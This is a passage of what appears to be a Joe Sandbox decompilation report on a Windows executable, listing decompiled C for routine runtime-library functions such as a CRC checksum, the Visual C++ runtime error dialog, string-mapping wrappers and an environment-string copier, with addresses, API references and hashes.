                              • String ID:
                              • API String ID:
                              • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                              • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418EF1 Relevance: .1, Instructions: 70COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

















                              0x00418ef1
                              0x00418ef4
                              0x00418ef6
                              0x00418efa
                              0x00418f00
                              0x00418f06
                              0x00418f0e
                              0x00418f11
                              0x00418f1a
                              0x00418f1e
                              0x00418f1f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418f1f
                              0x00418f24
                              0x00418f2a
                              0x00418f2c
                              0x00418f33
                              0x00418f36
                              0x00418f38
                              0x00418f3b
                              0x00418f40
                              0x00418f44
                              0x00418f4e
                              0x00418f58
                              0x00418f6f
                              0x00418f9b
                              0x00418f9d
                              0x00418f9d
                              0x00418fa2
                              0x00418fa5
                              0x00418fab
                              0x00000000
                              0x00418fad
                              0x00418fb1
                              0x00418fb4
                              0x00418fbd
                              0x00418fc1
                              0x00418fc1
                              0x00418fc8
                              0x00418fc8
                              0x00418f24
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418FCB Relevance: .1, Instructions: 70COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}













                              0x00418fcb
                              0x00418fd4
                              0x00418fd6
                              0x00418fda
                              0x00418fe0
                              0x00418fe6
                              0x00418fee
                              0x00418ff1
                              0x00418ffa
                              0x00418ffe
                              0x00418fff
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418fff
                              0x00419004
                              0x0041900a
                              0x0041900c
                              0x00419013
                              0x00419016
                              0x00419018
                              0x00419020
                              0x00419076
                              0x0041907d
                              0x0041907d
                              0x00419082
                              0x00419085
                              0x0041908b
                              0x00000000
                              0x0041908d
                              0x00419091
                              0x00419094
                              0x0041909d
                              0x004190a1
                              0x004190a1
                              0x004190a8
                              0x004190a8
                              0x00419004
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                              • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417836 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 100fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E00417836(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x422a58;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x422ae8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x422a58; // 0x2c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x423348; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
						_t16 = _t54 + 0x422a5c; // 0x41bd2c
						_t56 = _t16;
						_t19 = E004144D0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00418230( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E004144D0( &_v424) + 1 > 0x3c) {
								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
							E00418240( &_v164, _t49);
							E00418240( &_v164, "\n\n");
							_t12 = _t54 + 0x422a5c; // 0x41bd2c
							E00418240( &_v164,  *_t12);
							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                              0x00417836
                              0x0041783f
                              0x00417842
                              0x00417844
                              0x00417849
                              0x0041784d
                              0x00417850
                              0x00417856
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417856
                              0x0041785b
                              0x0041785e
                              0x00417864
                              0x0041786a
                              0x00417872
                              0x00417963
                              0x00417963
                              0x0041796e
                              0x00417980
                              0x00417889
                              0x0041788f
                              0x004178ab
                              0x004178b9
                              0x004178bf
                              0x004178c6
                              0x004178c8
                              0x004178d8
                              0x004178f3
                              0x004178fb
                              0x00417900
                              0x00417900
                              0x0041790f
                              0x0041791c
                              0x0041792d
                              0x00417932
                              0x0041793f
                              0x00417955
                              0x0041795d
                              0x0041788f
                              0x00417872
                              0x00417988

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                              • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                              • WriteFile.KERNEL32(00000000), ref: 00417980
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$HandleModuleNameWrite
                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                              • API String ID: 3784150691-2787626558
                              • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                              • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041881D Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                              Download Yara Rule
                              C-Code - Quality: 61%
                              			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x41be00);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x423554; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E00418A41(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x423554; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x42354c; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x423554 = 2;
							goto L5;
						}
					} else {
						 *0x423554 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                              0x00418820
                              0x00418822
                              0x00418827
                              0x00418832
                              0x00418833
                              0x0041883a
                              0x00418840
                              0x00418845
                              0x0041884b
                              0x00418893
                              0x00418896
                              0x0041889e
                              0x004188a4
                              0x004188a5
                              0x004188a5
                              0x004188a8
                              0x004188b0
                              0x004188d2
                              0x00000000
                              0x004188d8
                              0x004188db
                              0x004188dd
                              0x004188e2
                              0x004188e2
                              0x004188f2
                              0x00418902
                              0x00418904
                              0x00418909
                              0x00000000
                              0x0041890f
                              0x0041890f
                              0x0041891a
                              0x0041891f
                              0x00418924
                              0x00418927
                              0x00418943
                              0x00000000
                              0x0041895e
                              0x00418970
                              0x00418972
                              0x00418977
                              0x00000000
                              0x00418979
                              0x0041897d
                              0x004189bf
                              0x004189ce
                              0x004189d3
                              0x004189d6
                              0x004189d8
                              0x004189db
                              0x004189f5
                              0x00000000
                              0x00418a0f
                              0x00418a12
                              0x00418a13
                              0x00418a14
                              0x00418a1a
                              0x00418a1d
                              0x00418a16
                              0x00418a16
                              0x00418a17
                              0x00418a17
                              0x00418a30
                              0x00418a34
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418a34
                              0x0041897f
                              0x00418982
                              0x00418a3a
                              0x00418a3a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418982
                              0x0041897d
                              0x00418977
                              0x00418943
                              0x00418909
                              0x004188b2
                              0x004188c4
                              0x004188c4
                              0x0041884d
                              0x0041884d
                              0x0041884e
                              0x00418851
                              0x00418867
                              0x00418883
                              0x004189ab
                              0x004189ab
                              0x00418889
                              0x00418889
                              0x00000000
                              0x00418889
                              0x00418869
                              0x00418869
                              0x00000000
                              0x00418869
                              0x00418867
                              0x004189b3
                              0x004189be

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                              • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                              • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                              • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                              • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: String$ByteCharMultiWide
                              • String ID:
                              • API String ID: 352835431-0
                              • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                              • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041750F Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041750F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x423508; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00413E65(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00414090(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00413E65(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E00413F9F(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x423508 = 2;
					goto L18;
				}
				 *0x423508 = 1;
				goto L6;
			}















                              0x00417511
                              0x00417520
                              0x00417522
                              0x00417524
                              0x00417528
                              0x00417560
                              0x004175ea
                              0x00417638
                              0x00000000
                              0x00417638
                              0x004175ec
                              0x004175ee
                              0x004175fc
                              0x004175fe
                              0x00417600
                              0x0041760c
                              0x0041760f
                              0x00417617
                              0x0041761c
                              0x00417625
                              0x0041761e
                              0x0041761e
                              0x0041761e
                              0x0041762e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417602
                              0x00417602
                              0x00417602
                              0x00417602
                              0x00417603
                              0x00417607
                              0x00417608
                              0x00000000
                              0x00417602
                              0x004175f6
                              0x004175fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004175fa
                              0x00417566
                              0x00417568
                              0x00417576
                              0x00417579
                              0x0041757b
                              0x0041758b
                              0x00417597
                              0x0041759e
                              0x004175a4
                              0x004175a8
                              0x004175ab
                              0x004175b3
                              0x004175b7
                              0x004175c8
                              0x004175ce
                              0x004175d4
                              0x004175d4
                              0x004175d8
                              0x004175d8
                              0x004175b7
                              0x004175dd
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041757d
                              0x0041757d
                              0x0041757d
                              0x0041757e
                              0x0041757f
                              0x00417585
                              0x00417586
                              0x00000000
                              0x0041757d
                              0x0041756c
                              0x00417570
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417570
                              0x0041752c
                              0x00417530
                              0x00417544
                              0x00417548
                              0x00000000
                              0x00000000
                              0x0041754e
                              0x00000000
                              0x0041754e
                              0x00417532
                              0x00000000

                              APIs
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                              • String ID:
                              • API String ID: 1823725401-0
                              • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                              • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418A6C Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x41be18);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x423558; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x42354c; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
